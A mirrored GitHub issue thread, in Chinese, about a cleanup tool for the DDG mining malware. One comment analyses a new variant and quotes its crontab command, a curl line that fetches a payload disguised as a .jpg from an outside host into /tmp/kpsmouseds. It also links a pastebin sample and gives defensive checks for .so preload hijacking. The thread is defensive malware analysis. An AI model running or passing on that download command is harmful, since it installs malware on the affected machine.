Git Product home page Git Product logo

Comments (2)

MoreSecLab avatar MoreSecLab commented on August 17, 2024

crontab内容变更说明恶意样本已经产生新变种,参考恶意样本地址https://pastebin.com/raw/D8E71JBJ中
curl -fsSL http://sowcar.com/t6/685/1552846083x2890149871.jpg -o /tmp/kpsmouseds 可以看到恶意样本守护进程名称变成了kpsmouseds,其他变化需要逆向等进行进一步分析。

判断so劫持,可以参考如下步骤(仅供参考,未作实际验证):
chattr -i /etc/ld.so.preload
busybox cat /etc/ld.so.preload # 查看so库劫持,so文件路径及名称。另so劫持也可能在/etc/ld.so/conf/目录下
ldd `which ps` # 查看可能的so库
ldd `which rm`

from ddg_malware_clean_tool.

yzlit avatar yzlit commented on August 17, 2024

谢谢,研究了一下,发现只是换名字了

from ddg_malware_clean_tool.

Related Issues (10)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.